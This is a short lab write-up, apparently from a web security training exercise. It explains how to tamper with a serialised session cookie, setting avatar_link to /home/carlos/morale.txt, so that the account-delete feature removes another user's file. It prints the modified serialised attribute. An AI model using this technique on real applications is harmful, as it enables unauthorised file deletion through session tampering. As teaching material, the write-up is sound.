Using application functionality to exploit insecure deserialisation

Description

This lab uses a serialisation-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialised object.

Reproduction

  1. Log in to wiener:peter. On the My account page, there is an option to delete the account by sending a POST request to /my-account/delete.

  2. Intercept the request.

  3. Study the session cookie using the Inspector panel. The serialised object has an avatar_link attribute, which contains the file path to your avatar.

  4. Edit the serialised data so that the avatar_link points to /home/carlos/morale.txt. Update the length indicator. The modified attribute looks like this:

s:11:"avatar_link";s:23:"/home/carlos/morale.txt"

  1. Click Apply changes. The modified object will automatically be re-encoded and updated in the request.

  2. Forward the request. Your account will be deleted, along with Carlos’s morale.txt file.

Exploitability

An attacker will need to log in to wiener:peter; edit the serialised object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.